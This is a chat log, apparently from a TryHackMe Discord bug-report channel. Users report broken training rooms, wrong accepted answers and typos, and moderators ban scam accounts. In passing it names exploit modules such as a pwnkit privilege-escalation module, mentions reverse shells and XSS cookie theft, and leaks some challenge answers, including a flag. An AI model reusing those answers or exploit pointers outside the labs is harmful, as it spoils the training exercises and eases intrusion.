#room-bugs

That room is deprecated, so yes, it is working with an outdated version of metasploit 🙂

Is this room broken? I can't get the user john after running pspy64 and seeing the payload work. Can i dm someone for a sanity check? https://tryhackme.com/room/enterprize

Pyramid of Pain Task 3: Is this supposed to say "adversary"?

Also, same room, task 5, I think the last two questions in that task were copied and pasted incorrectly? The both ask for the document name even though one is asking for the dropped binary, and the other is asking for the document

Fixed. 🙂

Windows Internals: In Task 7 there is maybe a bug I execute the inject-poc.exe and get a flag but the answer is everytime wrong ?

Or did I do something wrong ?

Hello every one, i blocked on the Linux PrivEsc room on the Task 9, cronjob related task, it's seems like cron don't execute the scripts ..
https://tryhackme.com/room/linprivesc

can i dm someone ? will i waiting for responses, i found out an other way to get the flag, and that not the purpose of the task 9 .. so i don't know if i'm going wrong here

You can DM me if you’d like.

@queen sphinx

-ban 371488617949822978 -ddays 1 Game scam campaign

🔨 Banned Yun#4421 indefinitely

So Im in the Buffer Overflow room and I'm pretty sure I have the right answer for Task 10 but the answer checker says its wrong. mona gives me this "\x00\x04\x3e\xe1"

nevermind

There is an issue in task 8

Nax ctf medium

What is the full path for the exploitation module ?

I have submitted ans { exploit/Linux/http/nagios_xi_authenticated_rce }

https://tryhackme.com/room/activerecon Task 4 - Question 1 - it says what is the IP address of the last router/hop BEFORE reaching tryhackme.com - which has an IP address of 172.67.69.208. Line 14 says 172.67.69.208 - so hasn't it reached tryhackme.com? So shouldn't the correct answer be line 13? 100.92.9.83?

Same for Task 4 - Question 2

@dusk veldt

Thanks it work !

Gave +1 Rep to @median coral

I'm currently doing the Post exploitation room and I'm not even able to complete one entire task as the Box keeps reconnecting every minute or the other. I'm using Remmina for RDP Access. Can someone help me out on this?

My problem is not for a specific room...but i think it's ok to mention it. I've experienced the same problem with other PCs too. So, I usually extend my time when a deployed machine starts. And after about 1 hour...i get a notification that the machine is terminated(It's not actually terminated). But there's still 1 hour left? When i refresh the page the machine options show but it's kinda annoying.

This is a site bug, and is known

Oh

Why does that happen tho?

It's a bug, a programming error.

Don't know if it's a bug, but in the kibana room (https://tryhackme.com/room/kiba) if I leave my reverse shell and try to launch it back from the web interface, it doesn't give me back the reverse shell and I need to reload the room.

Good morning everyone,
I was going through the Linux Fundamentals 2 room in TryHackMe https://tryhackme.com/room/linuxfundamentalspart2 and I noticed under Permissions 101 there is this Comment of switching User, which I think it has come there by some error as in the YouTube Video that is linked, there is a Diagram of permissions, can any one look into that?

Screenshot of the Video

Chances are the room was modified and the video wasn’t updated

Happens a fair bit and very little will be done about it

The image in the video would make more sense at that point, because it goes over the permissions and that part explains permissions, switching users comes later in that task and has the same picture again on how to switch to user2

I thought the same

Please don't send unsolicited friend requests

Sorry

@dusky junco @eternal summit

hi, i can't access the chajoh user in the Osiris room can someone check if is a bug or not??

All good?(:

Also good morning

Yeah., just a game invite spammer, fluff got them.

Ah cool cool

Wasn’t sure if that was the one that fluff got or not

Thanks for the ping!

the chajoh user did not appear when i run 'net user' as authority\system

I do everything exactly the same as the writeups to get the third flag and the last step is to login as chajoh and get the flag

@dense garnet sounds like you had the same issue as this person ^

Already helped him in DMs yesterday.

👀

yes you help me get the tool i need for the room but i haven't realized i can't login as that user, i did try and fail but i thought i was being dumb and sorry for the late response, if it's late night your timezone sorry for bothering

The Unquoted Path doesn't work, I suggest you look for exploit "recently" found since the machine is about 1.5 years old.

oh I finished that part and did get the first two flag

yeah now you need to go on ra2 and get stuff from there.

oh wait ra2 i get mine stuff from ra

I finished about 90% just need to login as chajoh and get the flag

yeah so whats wrong?

pretty sure ra2 since it's the domain controller

oh

the problem is there are no chajoh user only the user folder

oh yeah, why do you need the user though?

you are SYSTEM

the flag is in the user chajoh keepass i need to re-create new KeePass masterkey useing DPAPI key from ra2

after that i have to login as chajoh to open keepass without the password

oh yeah, I can't remember how I did it but it was tricky

yeah i just want to finish the WindCorp Series

thanks for your help though

Gave +1 Rep to @dense garnet

I think all pictures are not loading in this room OR they don't exist in original source
https://tryhackme.com/room/bashscripting

they load find for me

try a different browser ?

It work on safari but not on Chrome 👀

i load it on Chrome 🤔 🤔

Hi
The Yara room -> https://tryhackme.com/room/yara
Task 6
6.3. Combining keywords
In this example where $txt_file = ".txt", it checks the string inside the file not the extension, and I tried it in practice to make sure, and yes it is not working with file extension it works with only the text inside.

Is anybody else facing issues with task 7 from the OWASP Top 10 room? https://tryhackme.com/room/owasptop10

For me the page is taking forever to load in the attackbox, seemingly waiting for fonts.googleapis.com.

If you're a free user, the attackbox doesn't have internet

It should give up and use a backup font

Oh, alright, that makes sense. I am going to get my subscription renewed sometime this week, so will probably just skip over that task for now :)
Thanks for your help, James!

Gave +1 Rep to @eternal summit

Month later, same issue.

Just going backwards and refreshing my mind on a few topics and noticed that the IntroToNetworking - WHOIS question about Facebook is out of date; "Which city is the registrant based in?". Based on the current whois it does not work.

Really?
Does it ask you which city Facebook is registered in?

Pretty sure it tells you to switch domain

Can you make this very blatantly clear? Big text?

Not according to the room formatting guide

Counterpoint - people keep messing this up and especially arguing over it because they do not read.

Im big enough to apologize for misreading. There's no need for snark.

You're fine, it's the people who actively argue with it once you point it out. Happens more than it should.

Understood

Apologies -- it's not the first (or hundredth) time that someone has reported that one, but that's not something you could have known ♥️

All good.

Thanks for the info, I will make sure to read the question thoroughly next time I have one I feel is possibly a bug.

hey room cross site scripting Task7 level 2 doesn't work i think script is never launch, it's normal ?

In the " Hands-On Lab " section in this room: https://tryhackme.com/room/activedirectorybasics there is a link to a powerview cheat sheet. However this is the cheat sheet for PowerView 3.0. And the powerview version in the room is 2.0 so none of the commands in the cheat sheet work.

The current link: https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 (these commands do not work in the room)
The link (I think) it should be: https://gist.github.com/HarmJ0y/3328d954607d71362e3c (these commands do work in the room)

on this lesson: https://tryhackme.com/room/authenticationbypass, in Task 2 "Username enumeration", when they start explaining what the flags mean, when they get to -d there is one typo. "The -d argument specifies the data that we are going to send. In our example, we have the fields username, email, password and cpassword. " cpassword -> password

cpassword is a 32-bit AES encrypted password that you can set via GPO (and a liability) https://www.mindpointgroup.com/blog/privilege-escalation-via-group-policy-preferences-gpp

96.1% of users have no problem with answering this question. 😄

Vocal minority

Room - intro to pwntools: ASLR is enabled, is it intentional?

In the room there is - Please read the note and disable ASLR.

IIRC, you should be able to run a script with sudo
Check sudo -l 🤔

You're right, thanks!

Gave +1 Rep to @teal basalt

In hacking with powershell https://tryhackme.com/room/powershell task 4 What is the path of the scheduled task called new-sched-task? The accepted answer is / when the path is actually \

I am currently working on Compia Pentest+ > Nmap and on task 14 I had to actually scan the first 10000 ports on target as 5000 didn't show any ports.
Just thought I should mention it here.

OWASP juice room... not sure why I'm not getting any flags for successful xss Task 7. Tried all three. Got the first two to work but not the third (I think? I mean... maybe not sure about the third one)

what I mean is. no popping flags for 7.1 and 7.2 tasks even if successful. 7.3 questionable cause not sure I did it right

❤️

Hi, i think there is a bug in task 4 exploiting SMB of room Network services. I can't access doing smbclient //[IP]/profiles, they ask me for a password. Or there should be no password. I am stuck and i don't understand why it doesn't work so i think it is a bug

How long after the machine started did you scan the ports?

Press enter.

1-5000 isn't first 10000 ports👀

About an hour and a half.

Right, the instructions on thm told me the first 5000, though googling it after issues showed to do 10000 instead

Where the ports found actually above 5000?

Sorry, can't confirm that now. Already shut my system down for the night.
Just know that changing to 10000 worked.

Oh okay.

@queen sphinx @gleaming shadow

Also in #voice-chat

And #wreath-network

-ban @wheat fractal -ddays 1 Game phishing. Secure your account and then appeal this ban by emailing bans@tryhackme.com.

🔨 Banned mk16#4352 indefinitely

looks like James got it

@dense garnet got em

Ninja fits you well xD

Hi, im having trouble answering the first question in task 5 of File Inclusion Local File Inclusion - LFI #2, the "correct answer button" is not working, is it working for some of you? i would like to know if im the one getting error or the room has bugs, thanks for the help

i am sorry pressing enter doesn't work, the password is required but it shouldn't for this task...

Hey, I just checked today and the task that I mentioned is fine and all ports were indeed under 5000.
My VM Machine was just having issues and had to kill it from dev console.

Awesome! good luck with the rest!

Really looking forward to 100% juice room (not just the tasks). Tested and xss still down :3 uh… no rush.. just excited

Anyone else not seing any outcome of the data collection in the redline room? Have tried several times, from scratch, but it never generates the .mans :)

Evening! Having trouble with Investigating Windows #3, at the last module in the stack question. I'm entering the good value (<********) but it doesn't seems to work. 😦

it works for me <un****>, right?

yep

i checked for encoding, copy paste from procmon, changed machine in case something was wrong

no bueno

it's a seven character word?

seven characters, in between a < and >

tried switching browsers .etc.?

yep

even tried.. edge.

then, it might be a room bug, cause it accepts for me

can you provide a clearer gif?

Is it telling you it's wrong, or is it Uh Oh! Undefined

Uh Oh! Your Answer if Incorrect

I'll try. Don't want to spoil the other answer around

it was just to ping the room creator with proof

making another one right now

prolly best to hide the other answers, I guess

should be clearer/hidden other answers

that's the wrong question,

arf, deleted the wrong div

cc @hazy hinge "Investigating windows 3", 3rd question from the end, correct answer is not supported for some reason

i have to get my kids off daycare now. but ping me if you need anything else and i'll come back to you whenever i get back on my pc

25daysofchristmas (advent of cyber 1 2019) Day 9 requests asks to connect to 10.10.169.100 port 3000

port is filtered and cannot access, can ping the ip though

That room is a crime against humanity IMO

Took me like 12hrs overall

Yeh, took me longer longer 👀

Haha

@wheat fractal Are you ok?

yeah, sorry, is there requirements on posting bugs?

Make sure it's actually a bug first, preferably by checking in #room-help that it's not user error
Then post enough detail about it

Yeah, some experienced people checked and told that it's a bug

https://tryhackme.com/room/rpwebscanning

Task 3 - Question 8 (4 from bottom):
Featured in various rooms on TryHackMe, Cross-Site Scripting is a vicious attack that is becoming ever more common on the open web. What Alert does ZAP produce to let us know that this site is vulnerable to XSS? Note, there are often a couple warnings produced for this, look for one more so directly related to the web client.

Looks like new OWASP Zap versions can't find XSS vulnerability.
1 -> It should have "Web Browser XSS Protection Not Enabled" alert.
2 -> But it doesn't.

That room is no longer maintained

Ok, how can I tell if a room is not maintained?

Really you can't

ok

In room
https://tryhackme.com/room/windowseventlogs

task4 : question 3
they mention to check the example 7 ,
but in the website (https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/Get-WinEvent?view=powershell-7.1) its example 8 .

/room/linuxstrengthtraining

@glad badger one for y'all ^ (:

Can't get a response back using nc OR 10.10.10.100 on task 8 of Cross Site Scripting room.

Fixed. Also fixed etc. and asymmetric 🙂

Ok got the reason the OWASP juice xss wasn’t popping.. very specific quotations are needed.. so even if xss successful, have to use the walkthrough quotes.. :3 I’m just happy it works now lol

Currently working through the "Buffer Overflow Prep" room. I noticed the target machine count down timer isn't working correctly. The hour portion of the timer doesn't count down.

Nice one ☝️

#wreath-network message, apparently it's a site bug if you haven't recieved an answer until now :)

make sense :/

Thanks for the followup!

Hello guys, i have a bug during on my exploit (with metasploit) on BLUE room, same error with after reboot VM target

!dark

It more than likely is not a bug, that machine takes some tries to work properly

if you can show your errors or show options in #room-help someone will help :)

Oh okay thanks for you return, and last question sorry how have you role ?

Thanks a lot 🙂
Have a nice day guys

🙂

Knowing Blue, they might not have set the lhost.

most likely

uhh, @queen sphinx

let me know if you see any more of those in other channels

thought the bot deleted the messages automatically 🤔

when the're banned i.e.,

Oh, it's a -dday 1 difference, delete previous days messages, nice

-ban 832622412403179551 -ddays 1 no thanks. Sharing discord scam URLs. Ban appealrs are bans@tryhackme.com

🔨 Banned mrjan#5445 indefinitely

It's fixed now, just tried the answer myself, :)

Woot! Thanks. Just did it too.

Gave +1 Rep to @median coral

same for me, I guess that since that day does not include a machine to deploy the IP could have been repurposed at some point during 3+ years since this task was published 😛 (but I am but a simple user and ofc cannot be sure) I was able to google the answer tho..

Hi everyone. The whois information of RepublicOfKoffee.com domain has changed. My friend just told me. I am talking about Webosint room. https://tryhackme.com/room/webosint

I really think there should be a typo room, cause most bugs reported are just typos and could crowd up the channel and get actual bugs unnoticed.

Actual bugs get forwarded straight into a separate channel for QA

Where should I report errors in rooms? It's a slight text error but confuses the student

Here

oh cool, good idea haha

That's already what happens 😆

yhyh I meant like whoever thought it it had a good idea haha

Go to the hacker101 CTF thing and on top there should be a flag checker

And I’m pretty sure the Hard challenge is impossible, but I got it in a cheeky way, I managed to escape the docker containers and get to the host, and after that I just logged in to the docker containers from the host and got the flags haha

In the room Active Reconnaissance https://tryhackme.com/room/activerecon subroom Telnet. I tried running this on a up to date Kali Linux OS. I follow the instructions to connect to port 80 of the server instance with telnet with the commands: telnet 10.10.242.116 80 then I tried to get the banner with GET / HTTP/1.1 the response I get is that the server pauses for a minute and then closes. I have provided a picture of what the server response with below.

Did you try to do what the task instructed instead of just waiting for the connection to close?

Alright, I didn't do that but then I follow the instructions more carefully and sped through the telnet commands as fast as I could and got this output:

I don't know if it's meant to time me out as fast as it does but I have about 3 seconds before it times out

It's not suppose to stay open long, but also what is that ip you are connecting, because that doesn't look like thm machine ip? And maybe it would be better to move to the room help instead

You're right. Thanks I was rushing because I need to get back to work and I wanted to respond to you ASAP. Anyway, yes that was my issue. Not following instructions and the second time was an incorrect IP that I have 0 idea where I got it from.

Gave +1 Rep to @modern raven

We're looking into this. 🙂

Room has been made private. 🙂

Gave +1 Rep to @glad badger

Anyone else having an issue with the OWASP Juice Shop Room, Task 7 Question 2 'Perform persistent xss'?

I got the answer :3

So don’t type it.. copy the task fed insert

using the box or openvpn?

Because the ‘ is different

I know

I tweeked it and got the XSS to be persistent, but no flag

They specifically want the slanted ‘ not just a typed one. Oh ok you know haha that’s what was not working for me

Yeah it wouldn’t give me the flag if I typed the xss myself even if xss worked.

Sorry then I guess you have a different issue than I did. I had to literally copy it over to the attack box to make sure the character ascii was what they wanted

How did you make that character?

I copied it CTRL+C

Didn’t bother looking up the hex

lol

k

Or the ascii code. Just copy… as if you don’t know what you’re doing and copying every fed code they give

You used the Attack Box?

Pretend you can’t type :3

Yeah

This happens in some ctfs when they save to things like Word.. the program is “smart” and will recode your character

Ok, I am trying it now thanks

Np! Hope it works out

A way to fix this I think is to redo the answer accept to multiple quote types… but not sure how difficult it would be :<

Juice Shop is actually independent of THM

Ohhh interesting :3

``` is a backtick

Holy Turd Burgers...it worked! I never thought to just copy the text that literally right in front of my face, lol

Yaaah that’s the name ❤️ thanks 😊

Gave +1 Rep to @eternal summit

Yayyy yeah it bugged me for three days when I got lazy and just copied it to see :3 the backtick also hindered me in a defcon ctf which made me ponder

There are also pretty-print quotes, which are problematic but not used in programming languages (I hope no languages at all)

Two minor language bugs in https://tryhackme.com/room/dirtypipe

@MuirlandOracle#2721 have a look ^

Just ping if you spot things like this 🙂
Joys of working through the early hours of the morning.
Fixed both

Who did you get to proof read it?

@misty cave

tbf reading in your head those types of mistakes are very hard to spot

Tbf, it hasn't officially gone through QA yet -- Skidy wanted it pushed out ASAP, so I was kinda doing it blind

Just got Robert to unofficially take a look at it. In fairness to him, task 2 didn't exist last night

I was joking,

This Venn diagram explains it all 😂 https://www.pyragraph.com/2013/05/good-fast-cheap-you-can-only-pick-two/

I am the dream 😊 😆

The real attainable metric of course had to come from NASA, with sneaky language: Faster, Better, Cheaper. The wording shows more attainable measures in that it focuses on improving all three simultaneously, instead of demanding all three at the max from the start. 😎

Wonderland stops responding to anything every 3 minutes. I tried restarting the machine nothing changed.

There's no cronjobs or anything on the machine, doesn't do it for anyone else either. VM hasn't been touched at all.

i realized there was two instances of openvpn (username).ovpn that was probably the reason

Yeah, that would do it 🙂

Woops 😄 In my defence it was 1 am and it took 966 users almost 17 more hours to find em 😄

... I'm an idiot, I just saw what went wrong 😄

The command output given in the room may be an example. And you are tryhackme user in your screenshot, so it's home directory is /home/tryhackme and not /home/ubuntu (it could be this, but it isn't)

Yeah, i just noticed. Guess I'll complete this room and go to bed.

Hello. I recently finished ZTH: Web 2 on the web fundamentals path. I was having a hard time finishing section 2 forced browsing automatic exploitation as wfuzz was throwing errors at me left and right even after installing and reinstalling it.

Anyways

This was the error that it was throwing at me
I had to manually nano into the wfuzz and change this

I changed the interpreter from python3 to python2 and it worked. Just a heads up as it was frustrating as I thought I was doing something wrong for a long time.

Moreover, this isn't really a bug but something that took me a long time to realise as I was already frustrated from wfuzz not working. When I use the machine IP address and go to the website in task 6 the pictures in the task are a bit misguiding as paradox(the room creator) uses the directory localhost/noot/note.txt to retrieve the txt file and they have to change the user to admin to get the flag. Although in the actual attackbox when typed IPADDRESS/admin/note.txt it redirects to a 404 page not found. Instead its goes through a GET request note.php?note=1 for noot and ?note=0 for admin. This is important as in the next task, task 7 when using wfuzz I thought I had to enumerate the numbers and got very confused as I was not getting anything back. Instead I had to use the MACHINEIP:81:/FUZZ/note.txt. I honestly am not sure if I'm just stupid or overacting but yea Its just something that confused me a lot as the pictures on the tasks were diffrent than what I had to do on my own attackbox. 🙂 sorry for the rant

Yup, yet another room expecting incorrect answers. This one has been sitting for over 7 months since it was first called out @hazy hinge

I believe I found a bug in the Linux PrivEsc room Task 11 machine. After I compiler my code and I try to run it on the target machine I get a
"/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by "
Error. I did a little googling and it seems to be an issue with the version of compiler I used on my machine and the target machine.

the button to submit is missing from the redteam opsec room task 2 for me

There's no button to submit, as soon as you have selected the correct items, the flag will appear. 🙂

OWASP Juice Shop in task four the provided location of best1050.txt is not in usr/share/passwords but in another directory.

room: https://tryhackme.com/room/tshark

Task 3 question 4 & 5:
accepted string
MZWGCZ33ORUDC427NFZV65QBOVTWQX3XNF2GQMDVG5PXI43IGRZGWIL5 <- correect string

but actually decoding it in base32 return
flag{th1s_is_v.ugh_with0u7_tsh4rk!} <- is incorrect flag

The flag is ||flag{th1s_is_tough_with0u7_tsh4rk!}||

No, they're not, lol

The string should be MZWGCZ33ORUDC427NFZV65DPOVTWQX3XNF2GQMDVG5PXI43IGRZGWIL5

it did accepted the string tho

tshark -r dnsexfil.pcap | awk -F . '{print $8}' | awk '{print $9}' | tr -d '\n'

m,

linux privesc room, task 10, user can't actually touch files in /home/user

workaround is to sudo nano, place a # and save file as required names

Thank you for reporting. 👍

Gave +1 Rep to @inner dagger

-ban @rich bear -ddays 1 Github "NFT generator" phishing scam

🔨 Banned ilanik#3664 indefinitely

room/rpnessusredux: "Scanning!", "What Apache HTTP Server Version is reported by Nessus?" - expects 2.4.99 (which doesn't exist), the target VM reports Apache 2.4.25 (Debian) which can be seen both in Nessus and by manually connecting to port 80 and checling.

nessus room( https://tryhackme.com/room/rpnessusredux ) task 4 last question: correct answer is ||2.4.99|| even though this version does not exist yet and it reports as ||2.4.25|| with nessus and nmap which is not the correct answer.... see #room-help from this message forwards for more details: ( <#room-help message> )

You mean... like the message directly above yours states?

yuup sorry

missed that before shadow posted theirs.... hopefully shadow gave some more details that were helpful... if not feel free to remove

@analog moth hello, in the room "file inclusion", the image descriptions could be corrected. It refers to the get command as the file name

That is the file name. It's the file that you're requesting from the webserver.

in the context here - i thought "userCV.pdf" could be referred to as the file name ??

That's also a file name. But it's the the file you're requesting from the web server. It's a parameter for the php code that you're asking the server to run by requesting get.php

got it

in room/packetsframes where it comes to task 3, there is a closing conversation part, and Alice is using FIN/ACK to initiate closing the conversation, then bob replies with FIN/ACK and finally Alice with ACK... this is different than the description in step 2 where closing connection is starter with FIN, then replied with FIN/ACK and closed with ACK

Yup, it should have been FIN, FIN/ACK, ACK ?!

solid evidence, forgot to verify myself earlier so I could post it

Room nmap04 task 3, OS detection doesn't work for me if I follow the instruction "nmap -O TARGETIP". I have to add -sV to get OS detection working.

https://tryhackme.com/room/activedirectorybasics - room llinks to PowerView 3.0 tips and tricks but it's PowerView 2.0 that's installed on the VM

A typo in room "dirtypipe", Generating a SHA412Crypt Hash should be Generating a SHA512Crypt Hash (in the terminal window title)

@obsidian kiln you need more sleep I swear

I literally did type that at 0300 in the morning, and the room didn't go through QA

I'm genuinely surprised there weren't more

Exactly

Fixed. Thanks @valid chasm ♥️

Gave +1 Rep to @valid chasm

Thanks @obsidian kiln

Gave +1 Rep to @obsidian kiln

Aren’t you the one that reported like 50 typos so far?

Umm.. I dont think so :) just a few i think

https://uploadi.ng/MbKOSfRE

linuxfundamentalspart2, is there a fix for this?
terminal says "incorrect password"

That usually means you're using the wrong IP or mistyping the password. I'd recommend heading over to #room-help and verifying with the bot so that you can send screenshots

#bug-bounty

-ban @barren laurel -ddays 1 Nitro Scam -- compromised account

🔨 Banned (っ◔◡◔)っ ♥ littlemarmaid ♥#6700 indefinitely

https://tryhackme.com/room/networkservices2

/usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt
^^^ this is the wrong path. at least it was for me on Kali in a VM

path was /usr/share/seclists/Usernames/top-usernames-shortlist.txt

took me waaaaay too long to figure that out

uhhh, it's not really a bug, cuz I'm pretty sure the file path's mentioned in the room are for the attackbox ;)

shouldn't it mention that then?

it's kinda assumed , I guess but yeh

¯_(ツ)_/¯

i have a bug.

what is it?

just a bug or two

maybe a bed bugger.

actual bugs with rooms or are you trolling?

just a bug.

maybe a bit of lolling.

trolling ofc

Can you not?

@gleaming shadow @icy elbow

Ugh, ok

-ban 375945273379258368 -ddays 1 it appears your account is compromised by a nitro scam, please change your password and add mfa before appealing at bans@tryhackme.com

🔨 Banned Virtu#9780 indefinitely

Hi !
In the Linux Fundamental 2 learning program, I am root in the attackbox.
Is it normal ?

yes, it is intended :)

OKi, thanks 😉

Gave +1 Rep to @median coral

I don't think I'm in the good deployable machine anyway. Could you check it please ? I have screenshots or I can share my screen in a vocal channel

are you accessing the machine in your browser?

yes

then that's the attackbox, you're supposed to be root on it

That's what I thought

But I can acess to /Rooms folder, and I've no correct file to answer questions

again, that is intended and plz read through the instructions in the room thoroughly, they describe where files are placed

OKi, sorry for the inconvenience 😉

Same for https://tryhackme.com/room/postexploit

https://tryhackme.com/room/blaster
There is no history
and there are no other browsers

do you see a user.txt file in there?

navigating to that might give you the flag

The user flag is for previous question. The cve missing in the browser history is a bug, because if you look at the official walkthrough video it should be there but it isn't

ahh I see, thought it might be in there, nvm

yea what he said lol

I finished the room but its a bug

Some images in https://tryhackme.com/room/androidhacking101 are missing

Still in the same room in task 8. this part is hard to read.

In the same task is this blank part:

https://tryhackme.com/room/hackerofthehill

guys, this room is showing earned point when submitting flags but give 0 point on the total user score

do someone know if this is intended?

Room is no longer public, so will give 0 points. 🙂

😦

why is it not public?

:((((

so another 500 point that i will never be able to do...

Linux fundamentals introduces SSH later, the first few do it through the browser access same as the attackbox.

Good to know, thanks :)

hey guys, really not sure if this is a bug or not.
I'm currently doing the XSS room (/room/xssgi) and I'm unable to get Task 8 to complete. I can verify I am getting my own call-back onto a python http server, however I'm not able to get the staff-session cookie that should theoretically be generated by the room.

I initially wasn't able to get my own session cookie until after I disabled the mixed content blocking in Firefox. I'm wondering if this is potentially a bug with the room, or if I'm just missing something lol.

Already gave that a shot, I've tried using nc, python http.server, and the THM request catcher with a fresh machine booted up. None of these methods appear to be working.

Hey guys, I've just finished the Mindgames room (https://tryhackme.com/room/mindgames) and was able to root it via a totally different path as all the writeups are suggesting. So I'm not sure if it's intended that the box is also vulnerable for ||a 2021 CVE|| local privesc ?

Hey uh, the https://tryhackme.com/room/internal machine is vulnerable to cve_2021_4032 and you can use the metasploit module cve_2021_4032_pwnkit_lpe_pkexec for instant privesc from www-data to root 😛

how 'bout that

Loads of rooms are, it probably won’t be patched.

?

@silk python hello Kr1ss,

That exploit is much much much newer than the box

It's near impossible to update the boxes on THM without direct involvement from the THM staff, as a creator, so the only option is to reupload an updated copy. That kinda sucks, time and testing wise.

well imo it's good@eternal summit, having old machines vulnerable to newer exploit feels more "real" and lets us test newly released cves

The purpose of older machines are to be vulnerable to specific vulnerabilities so that you can learn. Having insta-root exploits is boring and not everyone will stick to the same rules so it makes it unfair, especially on incredibly difficult machines.

true@hazy tiger but still, a machine that was hard to hack irl 1 year ago but that hasnt been patched for log4shell and pwnkit is now an easy target isn't it?

the game on tryhackme is not fair and we know it, a lot of old machines are now retired

Still not a learning opportunity 🙂

it is

it only depends on how you approach it

people can still go out there and copy the flag froma walkthrough

it is up to you if you want to learn

If we have dedicated rooms with those exploits, walkthrough and a challenge, you have room to practice.

Not limiting yourself to just TryHackMe, you should hopefully come across the exploits you learn about on here on other sites and you can expand your practical knowledge.

If it hasn’t been patched and you’re using the unpatched insta-root exploit, you’re not only cheating yourself but you’re not actually helping yourself in the real world.

Just because something has a probability of occurring, doesn’t mean that it is likely to occur.

Not having that option really helps motivate

true, but what is thm going to do? patch all 500+ machines ?

i guess not

so, cheater will cheat

as we always see

(take a look at monthly hacker, most of them are 1-30 days accounts making 800+ events a day

And most of them get their accounts reset

well

first guy in switzerland is still first with 67k points

even though he surely cheated a lot

I’m sorry, I’m looking for your report of them in the inbox

Don’t see it anywhere

Don’t complain if you’re not going to at least attempt to prevent

Even a message in the Discord is enough for one of the staff members to pick it up

i mean, first i did not know you could report people, as i see it since i've been here (almost 2 years)

and second, you can see it in the monthly leaderbord

but ok

https://tryhackme.com/p/Br41nd34d

what does it look like?

Rule 5 of the Discord discusses cheating 🤷‍♂️

well, i'd like to report this guy then

Country leaderboards aren't monitored, only global.
You cannot get badges from country leaderboards, only the global one

multiple occasions of 500+ events a day and on date 07 february 2022 he made 700+ events

If you would like to report a user, you can report them to support@tryhackme.com 🙂

i'll do so, thanks

Be nice smh

My apologies 🙂

incorrect site version reported on the Pentest+ nessus room

both curl and nessus return 2.4.25, but the correct answer is apparently 2.4.99

sounds like this room is generally outdated and the scanning part is mostly broken, no?

hello on the Introductory Researching task 2 question 3 i know the answer but it keeps telling me i am wrong

can i write spoilers?

o ok ill do some more research sorry thanks for the time

o haha gee wizz

break it ( https://tryhackme.com/room/breakit ) task 3: question 1: 2D 37 2B 19 31 99 31 B3 B2 AB A5 18 32 37 20 B3 B2 AC 2D 1A 31 B4 A1 3A A4 A3 9C B4 AD 36 AC 9E turn into this when using cyberchef with bitshifts and things:

which is not valid base64 but it is supposed to be

already solved it by trial and error with another tool but feel like this hex input is somehow wrong

They will cheat themselves by learning nothing though. Points are meaningless when nothing is learned from gaining those points. 🙂

-ban @minor stump -ddays 1 NFT Game scam. Secure your account and appeal this ban by emailing bans@tryhackme.com

🔨 Banned ~Jay~#9908 indefinitely

-ban @wheat fractal -ddays 1 Nitro Scam.

🔨 Banned Tejaswi Pednekar#3832 indefinitely

@glad badgeryeah, that's exactly what i was saying.

https://tryhackme.com/room/intro2windows task 3, image explaining LDAP procedure, the text says "Lightweight Directory Authentication Protocol (LDAP)" but the acronym stands for Lightweight Directory Access Protocol

Do you guys even want these type of reports in here or is there a ticket system?

Here is perfect, thank you ♥️

Ok I'll keep them coming when I see then 😉

@dusky junco one for you ^^^ :)

got problem connecting on the Upload vuln Room. I did the modifications in the /etc/hosts but the website still telling me I didn't

and I can't connect to the Linux Priv Esc Machine

ssh says it refuses the connection

hi - im in the Hydra room. I run hydra on the web host and got 16 correct user/pass combos. However, when I try to logon to retrieve the flag, it says they are incorrect

@loud veldt can you paste your command?

when you get multiple logins it usually means you did something wrong and hydra interpret response as good while it's not.

It's been solved

oh

In #room-help

sorry

😉

🙂

@vital vineyep

Nice to meet you

WebOSINT first nameserver has changed. It needs to be updated from DNS1.REGISTRAR-SERVERS.COM to NS1.BRAINYDNS.COM

Registrant Country has changed too. It's not Panama anymore it's Iceland

I don't quite understand what you're saying

RepublicOfKoffee.com

If you lookup whois information it's different from what the information is given

Where are you from?

It's a room challenge.

https://tryhackme.com/room/webosint

That's a bit of personal information 🙂

@uneven nicheok thank you

Gave +1 Rep to @uneven niche

I’m currently stuck with an Error I’m receiving in the Network Services course task 3.. I’m receiving the following..
(Error NT_STATUS_HOST_UNREACHABLE..

From the attack box when I perform the smbclient command

It might not be 10.10.10.2, if that's what you used from the given command shown in the room

Replace it with the MACHINE_IP of the deployed machine

Thank you! it worked with the Machine_IP

Gave +1 Rep to @teal basalt

hello, im doing overpass3.. i obtained the foothold into the first shell.
i dont understand why my shell is not interactive

there are no way to stabilize it

any ideas?

okay, solved.. sorry for the mistake.

In the room encryptioncrypto101, Task 8, don't you need to update the answer to the site certificate issuer question ? (I don't know if I should post here or in another place)

Hello Community,
I have a Problem in the room "lunix fundamentals part3".
There is the task to look inside the logs of apache2 to find out a few informations.
But unfortunately there simply aren't log-files for apache2.
I started the attackbox (deployable linux machine) and want to fullfill that to accomplish that course.

Did someone of you faced the same issue or can help me somehow?
Would appreciate every help and thanks in previous!

You are suppose to deploy a target machine in task 2 and ssh into it. The log files are not in Attack box

There is the green start machine button and credentials in task 2

Oh yes i see, i fully forgot about that, that there is an intern accessible machine 😶‍🌫️
Thank you so much, appreciate your help! 💪

Gave +1 Rep to @modern raven

Hacking With PowerShell - Title PowerShell Scripting: Task 3, Question 1, the file is actually called interesting-file.txt.txt

@dusky junco

-ban @digital folio —ddays 1 some sort of scam

-ban @digital folio ddays 1 some sort of scam

🔨 Banned alemagno71#6653 indefinitely

🔨 Banned 823910237664706640 indefinitely

ty @median coral

Gave +1 Rep to @median coral

Have you checked the hint?

I've just checked and the answer hasn't changed

Fact is, I have a different issuer if I look at the certificate from the host and from my Kali VM

My antivirus editor replaced the certificate by its own

So in fact, the answer was good 😄

I'm almost certain I specified that in the hint

I try not to read the hints if I know how to solve

my bad :p

Please do read them especially before trying to report it as a bug. They're often there to steer you away from common pitfalls too.

lesson leaned

Hi I'm trying to connect to the Intro x86-64 room for about an hour or so, I restarted the machine five or six times but could only ssh into it once and the connection died after approximately 2 minutes, then I'm getting timeouts again. I'm connected and can access other sites so its probably not an issue on my side...

just now I was connected and again it died..

"connection closed by remote host"

Super minor grammatical correction in the Burp Suite (rpburpsuite) room: Task 12 asks the following question:

Which extension allows us** too** bookmark various requests?
It should say "to" instead of "too."

